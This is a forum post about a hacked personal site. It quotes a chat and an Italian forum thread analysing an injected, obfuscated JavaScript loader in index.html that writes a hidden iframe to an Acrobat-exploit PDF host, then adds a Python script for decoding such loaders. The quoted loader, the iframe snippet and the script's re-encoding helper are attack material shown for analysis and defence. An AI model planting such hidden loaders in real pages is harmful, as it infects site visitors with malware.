
A recent attack on my site


Huckleberry Pie


OK, so Ram PM'd me on this, saying my message board was hacked. Here's our conversation:

stripedhamdonuts_moogle: but

stripedhamdonuts_moogle:

hxxp://www.chanchoi.cn.xx/cache/doc.pdf

peanuthead_069: ohh

stripedhamdonuts_moogle: that's the page alright

peanuthead_069: that's the site?

stripedhamdonuts_moogle: yeah

peanuthead_069: has malware, right?

stripedhamdonuts_moogle: the guy was trying a pdf trojan exploit

stripedhamdonuts_moogle: yep

stripedhamdonuts_moogle: [attenzione, il link contiene un exploit per acrobat reader!]

Probably translates to Attention: the link contains an exploit for Acrobat Reader

peanuthead_069: ok

peanuthead_069: we'll have this hax taken care of

stripedhamdonuts_moogle: ok, doing it message-by message

peanuthead_069: samspade the domain?

stripedhamdonuts_moogle: first post says:

hello to everyone,

I heard what happened:

I open the home page of my site and instead of the usual page it opens a link to a pdf file

hxxp://www.chanchoi.cn.xx/cache/doc.pdf

[attention, the link contains an exploit for acrobat reader!] (edited out to prevent any infections)

The thing made me very suspicious ... and I went to check my index.html file.

Someone must have changed it (and how, I would like to know) and written in this code:

<body onload="function a2(s){b='';for(i=0;i<s.length;i+=4>>1) b+=s.charAt(i); return b;} document.write(a2('\074u\x64n\151k\x76n\040th\x73w\164n\x79\154th\x65b\075f\x22u\166s\x69c\163rd\x69t\142nd\x69o\154n\x69u\164n\x79k\072n\x68o\151w\x64n\144\x65o\156b\x22f\076u\x3cs\151c\x66a\162t\x61i\155th\x65n\040u\x73n\162k\x63n\075th\x22w\150n\x74\164th\x70b\072f\x2fu\

peanuthead_069: I don't have the PDF reader here

stripedhamdonuts_moogle: lucky you

stripedhamdonuts_moogle: I have Acrobat Reader 5.0.5, only because I can't be assed to get the multi-hundred-megabyte downloads of the latest version

stripedhamdonuts_moogle: reply 1:

I have not made the link clickable because the pdf in question contains an exploit that attempts to exploit a vulnerability in Adobe Acrobat Reader (not only vulnerable version 8.1.2 or newer) to run code on the machine.

The script on your site writes the following code:

code:

<div style="visibility:hidden">

<iframe src="http://chanchoi.cn/index.php.x.mal" visibility:hidden width=100 height=80> </iframe>

</div>

A hidden iframe which loads the page, which then actually downloads the pdf.

You should try to understand how it was possible to inject into your home page, to prevent this from happening again ..

stripedhamdonuts_moogle: so, they used SQL injection...

peanuthead_069: maybe the chanchoi.cn site shares the same IP with the hackers

stripedhamdonuts_moogle: hmmm... or maybe hackers hacked the site to store their trojan exploit

stripedhamdonuts_moogle: third reply:

And indeed! What I do not understand is this! How is it possible that someone could change the homepage?

What could be the cause? Is there something wrong with the site, or is it a problem with the server it is hosted on?

I log in via ftp to upload files and the password is secure enough ... it is the one I was assigned by default and I never changed it .. if indeed it can even be changed ... I do not know precisely where to investigate to find out ...

On the control panel of your domain I have not made any changes, the only novelty is that I recently requested the activation of php support to put up a form for sending mail. Is that linked in some way to that? Perhaps it is the fault of the form in php?

Ah, I forgot .. I apologize for putting up a harmful link ... it was not my intention to harm! Indeed, unfortunately I have downloaded and opened the pdf and apparently nothing has happened (at lea

stripedhamdonuts_moogle: yeah

peanuthead_069: Maybe if I asked my mate Chris for it.

stripedhamdonuts_moogle: well, if you're interested in the rest, go ahead and translate them one-by-one on Google translate. I'm fairly convinced that those assholes used an SQL injection exploit on the forums now

stripedhamdonuts_moogle: oh, crap

peanuthead_069: what the?

stripedhamdonuts_moogle:

Virus: HEUR/HTML.Malware

Type: AHeAD Heuristic special detection

In the wild: No

Reported Infections: Low

Distribution Potential: Low

Damage Potential: Low

Static file: No

stripedhamdonuts_moogle: second last post

peanuthead_069: any other cases of similar hacking sprees?

stripedhamdonuts_moogle: just search google using the js string

peanuthead_069: ok

stripedhamdonuts_moogle: about half a dozen, so it must've been fairly new

peanuthead_069: Well, I'm not really that good at maintaining a site the hard way, but at least it was a thrilling experience

peanuthead_069: you can't be a good sailor if you don't ride the rough waves, I guess

stripedhamdonuts_moogle: very true

peanuthead_069: k, restored the index.html file

stripedhamdonuts_moogle: and well, this is quite an experience for me too. Now I'm worried about the stuff on the server :P

stripedhamdonuts_moogle: need to find out if that dropped anything on this PC now

peanuthead_069: I kept the other file (0backup) as evidence in case I report this to the FBI

peanuthead_069: Or to the Third Echelon, I guess

stripedhamdonuts_moogle: hmmm, searched again, google returns about 26 results

stripedhamdonuts_moogle: if including the forum post, I guess it's 27

stripedhamdonuts_moogle: but then, this may be just one of the many strings used, so there may be more

peanuthead_069: hmm, did a quick browse on my ftp and there aren't any files that were tampered recently

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: so only the index then?

peanuthead_069: yep, I guess

stripedhamdonuts_moogle: k

peanuthead_069: How did they manage to leak into it?

peanuthead_069: Password attack?

stripedhamdonuts_moogle: well, that forum mentioned SQL Injection

peanuthead_069: I'll do a scan on the databases

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: guess we're lucky that they did not decide to destroy the database too

stripedhamdonuts_moogle: in any case, if there's a new version of PhpBB, best upgrade for safety reasons

stripedhamdonuts_moogle: may be a vulnerability in the current PhpBB version?

peanuthead_069: maybe, but only the index.html in the root was tampered

stripedhamdonuts_moogle: hmmm...

peanuthead_069: the forum directory wasn't tampered I guess

stripedhamdonuts_moogle: k

stripedhamdonuts_moogle: any way we can force the server to redirect without using a index.html file?

peanuthead_069: nah, they might find another way

stripedhamdonuts_moogle: k

peanuthead_069: I'm planning on changing the password

stripedhamdonuts_moogle: k

peanuthead_069: and ask for some site security suggestions

stripedhamdonuts_moogle: good idea

I had the chanchoi URL edited to prevent infections; according to Norton SafeWeb, the site originated from Moldova, using a Chinese domain. The redirect script was obfuscated (read: masked); it made an invisible frame on the HTML file, which redirects to the script. This is an example of a drive-by download, in which exploits, or holes in the security of an application, are taken advantage of to infect users with malware.

I'm planning on some security measures on the site, such as a password change. Any thoughts on this?

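Added example, not code from the post or from either participant: a Python triage helper for a tampered index.html like the one above. It emulates the injected a2() decoder (resolve the \NNN/\xNN escapes, keep every second character), pulls the string out of document.write(), and lists the hidden iframes the decoded HTML would create. The host malicious.invalid and the re-encoded sample file are constructed fixtures; the obfuscate_like_loader helper exists only to build that fixture in the observed encoding.

```python
import re
from html.parser import HTMLParser

# JS string escapes the loader relies on: \NNN (octal) and \xNN (hex).
_ESC = re.compile(r'\\x([0-9a-fA-F]{2})|\\([0-7]{1,3})')
# document.write(<name>('<literal>')): the call that writes the decoded HTML.
_LOADER = re.compile(r"document\.write\(\s*(\w+)\(\s*'((?:\\.|[^'\\])*)'\s*\)\s*\)")

def js_unescape(s):
    """Resolve octal/hex escapes the way a JS engine would."""
    return _ESC.sub(lambda m: chr(int(m.group(1), 16) if m.group(1) else int(m.group(2), 8)), s)

def a2_decode(s, step=2):
    """Python twin of the injected a2(): unescape, then keep every second char
    (the loader's i+=4>>1 is just a disguised i+=2)."""
    return js_unescape(s)[::step]

class HiddenIframeFinder(HTMLParser):
    """Collect iframe src values inside a hidden container (or hidden themselves)."""
    def __init__(self):
        super().__init__()
        self.hidden, self.iframes = False, []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = (a.get('style') or '').replace(' ', '').lower()
        self.hidden |= 'visibility:hidden' in style or 'display:none' in style
        if tag == 'iframe' and self.hidden:
            self.iframes.append(a.get('src'))

def triage(html):
    """Find the loader, decode its argument and report injected hidden iframes."""
    m = _LOADER.search(html)
    if not m:
        return {'loader': None, 'decoded': '', 'hidden_iframes': []}
    decoded = a2_decode(m.group(2))
    finder = HiddenIframeFinder()
    finder.feed(decoded)
    return {'loader': m.group(1), 'decoded': decoded, 'hidden_iframes': finder.iframes}

def obfuscate_like_loader(payload, junk='u'):
    """Fixture builder only: reproduce the observed encoding (alternating octal and
    hex escapes, one junk letter between) so the sample resembles the real file."""
    return ''.join(('\\%03o' % ord(c) if i % 2 == 0 else '\\x%02x' % ord(c)) + junk
                   for i, c in enumerate(payload))

# Constructed sample with a placeholder host: the injected HTML from the post, re-encoded.
PAYLOAD = '<div style="visibility:hidden"><iframe src="http://malicious.invalid/doc.pdf"></iframe></div>'
SAMPLE_INDEX_HTML = ('<html><body onload="function a2(s){b=\'\';for(i=0;i<s.length;i+=4>>1)'
                     'b+=s.charAt(i);return b;}document.write(a2(\'%s\'))">'
                     '<h1>Welcome</h1></body></html>' % obfuscate_like_loader(PAYLOAD))
```

Running triage() over the real tampered file would give the decoded HTML and the iframe source to block, log-search and report; a clean index.html yields no loader and an empty list.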

hmm that's pretty weird eh.

i got this email with the subject "bbq cover requires urgent maintenance...or else", same as my dad. my dad rang up the person who "sent" it. supposedly they didn't even turn their computer on till 5 mins ago (like 1 hr after the email was sent)...i told my friend he had a virus and he thought i was joking :S
